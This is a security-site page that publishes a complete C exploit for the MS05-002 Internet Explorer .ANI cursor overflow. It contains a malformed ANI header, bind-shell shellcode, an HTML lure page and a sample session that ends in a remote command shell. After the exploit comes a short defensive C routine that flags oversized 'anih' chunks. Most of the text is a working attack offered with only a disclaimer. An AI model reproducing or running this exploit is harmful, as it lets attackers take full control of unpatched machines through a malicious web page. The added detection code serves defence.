Microsoft Internet Explorer .ANI Files Handling Exploit (MS05-002)

Summary

In January's monthly security updates, Microsoft released a patch that fixes a vulnerability in the handling of the .ANI (animated cursor) file format. More information can be found at: Windows ANI File Parsing Buffer Overflow (MS05-002). Below you can find a universal exploit code for this vulnerability.

Credit:

The information has been provided by houseofdabus (HOD).


Details

Exploit:
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 houseofdabus.
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049)
 *
 *
 *
 * .::[ houseofdabus ]::.
 *
 *
 *
 * (universal - for all affected systems)
 * ---------------------------------------------------------------
 * Description:
 * A remote code execution vulnerability exists in the way that
 * cursor, animated cursor, and icon formats are handled. An attacker
 * could try to exploit the vulnerability by constructing a malicious
 * cursor or icon file that could potentially allow remote code
 * execution if a user visited a malicious Web site or viewed a
 * malicious e-mail message. An attacker who successfully exploited
 * this vulnerability could take complete control of an affected
 * system.
 *
 * ---------------------------------------------------------------
 * Patch:
 * http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------
 * Tested on:
 * - Windows Server 2003
 * - Windows XP SP1
 * - Windows XP SP0
 * - Windows 2000 SP4
 * - Windows 2000 SP3
 * - Windows 2000 SP2
 *
 * ---------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++ : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Linux : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 *
 * ---------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05002-ani-expl.exe poc 7777
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * C:\>
 *
 * start IE -> C:\poc.html
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\Documents and Settings\Administrator\Desktop>
 *
 * ---------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission to
 * do so.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy, strcat, strlen, memcpy, memset */

/* ANI header: RIFF/ACON container whose "anih" chunk declares a length
 * of 0x37c (892) bytes instead of the 36-byte ANIHEADER structure */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

/* portbind shellcode (the bind port placeholder sits at offset 300) */
unsigned char shellcode[] =
"\xeb\x70\x56\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x40\x08\xeb\x09\x8b\x40\x34\x8d\x40\x7c\x8b"
"\x40\x3c\x5e\xc3\x60\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x05\x78"
"\x03\xd5\x8b\x4a\x18\x8b\x5a\x20\x03\xdd\xe3\x34\x49\x8b\x34\x8b"
"\x03\xf5\x33\xff\x33\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d\x03"
"\xf8\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x03\xdd\x66\x8b"
"\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c"
"\x61\xc3\xeb\x3d\xad\x50\x52\xe8\xa8\xff\xff\xff\x89\x07\x83\xc4"
"\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72\xfe\xb3"
"\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xa4\x1a\x70"
"\xc7\xa4\xad\x2e\xe9\xe5\x49\x86\x49\xcb\xed\xfc\x3b\xe7\x79\xc6"
"\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5e"
"\xe8\x3d\xff\xff\xff\x8b\xd0\x83\xee\x36\x8d\x7d\x04\x8b\xce\x83"
"\xc1\x10\xe8\x9d\xff\xff\xff\x83\xc1\x18\x33\xc0\x66\xb8\x33\x32"
"\x50\x68\x77\x73\x32\x5f\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59"
"\x8b\xd0\xe8\x7d\xff\xff\xff\xb8\x01\x63\x6d\x64\xc1\xf8\x08\x50"
"\x89\x65\x34\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0\x72\x50"
"\xff\x55\x24\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14"
"\x8b\xf0\x33\xc0\x33\xdb\x50\x50\x50\xb8\x02\x01\x11\x5c\xfe\xcc"
"\x50\x8b\xc4\xb3\x10\x53\x50\x56\xff\x55\x18\x53\x56\xff\x55\x1c"
"\x53\x8b\xd4\x2b\xe3\x8b\xcc\x52\x51\x56\xff\x55\x20\x8b\xf0\x33"
"\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6\x07\x44"
"\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d"
"\x77\x44\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x34\x50"
"\xff\x55\x08\xf7\xd0\x50\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55"
"\x28\xff\x55\x0c";

/* patch the bind port (network byte order) into the shellcode */
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)

unsigned char discl[] = "This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";

/* HTML page that loads the generated .ani as a CSS cursor */
unsigned char html[] =
"<html>\n"
"(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit"
"<br>Copyright (c) 2004-2005 .: houseofdabus :.<br><a href=\""
"http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx\">"
"Patch (MS05-002)</a>\n"
"<script>alert(\"%s\")</script>\n<head>\n\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n\t</style>\n</head>\n"
"</html>";

/* swap byte order of a 16-bit port (host -> network) */
unsigned short
fixx(unsigned short p)
{
    unsigned short r = 0;
    r = (p & 0xFF00) >> 8;
    r |= (p & 0x00FF) << 8;

    return r;
}

void
usage(char *prog)
{
    printf("Usage:\n");
    printf("%s <file> <bindport>\n\n", prog);
    exit(0);
}

int
main(int argc, char **argv)
{
    FILE *fp;
    unsigned short port;
    unsigned char f[256+5] = "";
    unsigned char anib[912] = "";

    printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
    printf("\tCopyright (c) 2004-2005 .: houseofdabus :.\n\n\n");
    printf("Tested on all affected systems:\n");
    printf(" [+] Windows Server 2003\n [+] Windows XP SP1, SP0\n");
    printf(" [+] Windows 2000 All SP\n\n");

    printf("%s\n\n", discl);
    if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
        printf("[-] Size of shellcode must be <= 686 bytes\n");
        return 0;
    }
    if (argc < 3) usage(argv[0]);

    if (strlen(argv[1]) > 256) {
        printf("[-] Size of filename must be <=256 bytes\n");
        return 0;
    }

    /* creating ani file */
    strcpy(f, argv[1]);
    strcat(f, ".ani");
    printf("[*] Creating %s file ...", f);
    fp = fopen(f, "wb");
    if (fp == NULL) {
        printf("\n[-] error: can't create file: %s\n", f);
        return 0;
    }
    memset(anib, 0x90, 912);

    /* header */
    memcpy(anib, aniheader, sizeof(aniheader)-1);
    /* shellcode */
    port = atoi(argv[2]);
    SET_PORTBIND_PORT(shellcode, fixx(port));
    memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);

    fwrite(anib, 1, 912, fp);
    printf(" Ok\n");
    fclose(fp);

    /* creating html file */
    f[0] = '\0';
    strcpy(f, argv[1]);
    strcat(f, ".html");
    printf("[*] Creating %s file ...", f);
    fp = fopen(f, "wb");
    if (fp == NULL) {
        printf("\n[-] error: can't create file: %s\n", f);
        return 0;
    }
    sprintf(anib, html, discl, argv[1]);
    fwrite(anib, 1, strlen(anib), fp);
    printf(" Ok\n");
    fclose(fp);

    return 0;
}
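The defensive counterpart, added here as an example and not part of houseofdabus's code: a RIFF/ACON chunk walker that flags an "anih" chunk whose declared length is not the 36 bytes of the ANIHEADER structure. The exploit's header above declares 0x37c (892) bytes for that chunk, which is the oversized length the unpatched parser trusted; build_sample_ani and check_sample are assumed helper names that construct test files inline.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Added defensive check, not part of the exploit: walk the RIFF/ACON chunk
 * list of an .ANI file and report an "anih" chunk whose declared length is
 * not the 36 bytes of the ANIHEADER structure (the exploit declares 0x37c). */
#define ANIHEADER_SIZE 36u

static uint32_t rd32le(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr32le(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)v;         p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16); p[3] = (unsigned char)(v >> 24);
}

/* Returns 0 for a well-formed anih chunk, its declared length if that is
 * not 36, and -1 if the buffer is not RIFF/ACON, truncated, or lacks anih. */
long long ani_check_anih(const unsigned char *buf, size_t len) {
    size_t off = 12;                       /* first chunk after RIFF header */
    if (len < 12 || memcmp(buf, "RIFF", 4) != 0 || memcmp(buf + 8, "ACON", 4) != 0)
        return -1;
    while (off + 8 <= len) {
        uint32_t csize = rd32le(buf + off + 4);
        if (memcmp(buf + off, "anih", 4) == 0)
            return csize == ANIHEADER_SIZE ? 0 : (long long)csize;
        if (csize > len - off - 8)         /* chunk runs past end of file */
            return -1;
        off += 8 + csize + (csize & 1);    /* RIFF chunks are word-aligned */
    }
    return -1;
}

/* Constructed sample (assumed helper): RIFF/ACON with one anih chunk holding
 * a 36-byte ANIHEADER (cbSizeof=36, 8 frames, 8 steps, rest zero) whose
 * chunk-length field is set to anih_len; out must hold 56 bytes. */
size_t build_sample_ani(unsigned char *out, uint32_t anih_len) {
    memset(out, 0, 56);
    memcpy(out, "RIFF", 4); wr32le(out + 4, 48); memcpy(out + 8, "ACON", 4);
    memcpy(out + 12, "anih", 4); wr32le(out + 16, anih_len);
    wr32le(out + 20, ANIHEADER_SIZE); wr32le(out + 24, 8); wr32le(out + 28, 8);
    return 56;
}
/* Build a sample with the given anih length and run the check on it. */
long long check_sample(uint32_t anih_len) {
    unsigned char buf[56];
    return ani_check_anih(buf, build_sample_ani(buf, anih_len));
}
```

A file that passes this check can still be malformed in other ways; the point is that the anih length field, not the file size, is what the vulnerable copy trusted.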

Categories: Exploits